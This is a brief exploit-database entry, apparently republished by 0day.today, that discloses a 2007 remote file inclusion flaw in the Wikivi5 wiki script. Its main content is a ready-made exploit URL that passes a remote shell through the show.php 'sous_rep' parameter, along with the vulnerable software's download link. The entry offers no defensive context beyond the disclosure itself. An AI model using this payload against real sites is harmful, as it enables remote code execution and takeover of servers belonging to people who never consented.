id: 1840
date: 05/05/2007
title: Wikivi5 (show.php sous_rep) Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

===============================================================
Wikivi5 (show.php sous_rep) Remote File Inclusion Vulnerability
===============================================================


# Wikivi5 Remote File Inclusion Vulnerability
# D.Script: http://wiki.vi5.org/fichiers/Wikivi5.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/handlers/page/show.php?sous_rep=Shell



#  0day.today [2023-03-25]  #